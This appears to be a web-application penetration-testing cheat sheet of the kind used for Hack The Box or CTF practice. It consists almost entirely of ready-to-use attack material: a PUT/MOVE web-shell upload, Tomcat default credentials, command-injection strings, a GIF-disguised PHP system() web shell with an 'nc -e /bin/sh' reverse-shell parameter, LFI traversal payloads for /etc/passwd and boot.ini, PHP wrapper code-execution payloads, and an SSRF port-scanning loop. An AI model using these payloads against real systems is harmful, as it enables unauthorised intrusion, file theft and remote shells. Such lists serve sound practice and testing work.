Web Application

Checking HTTP Methods

curl -i -X OPTIONS http://XXXX
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Curl usage
curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"

Shell via Put Method

Put Shell
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"

RFI

$ fimap -u "http://$ip/example.php?test="
$ https://github.com/lightos/Panoptic/

JBOSS

JMX Console http://$ip:8080/jmxconcole/

Tomcat Manager Default Credentials

Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password).

Command Injection

Command injection
`id`
| id
&& id
error || id
%0a id

File upload bypass

content-type:image/gif
GIF89a <?php echo system{$_REQUEST['ippsec']); ?>
?ippsec=nc -e /bin/sh ip port

SQL Shell

msql -u root -p
\! /bin/sh

LFI

Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
Wordlists
/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt

LFI Wrappers

LFI Wrappers
expect://
http://x.x.x.x/blah?parameter=expect://whoami
data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
input://
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>

LFI to RCE

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data

SSRF

for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d “\n”; done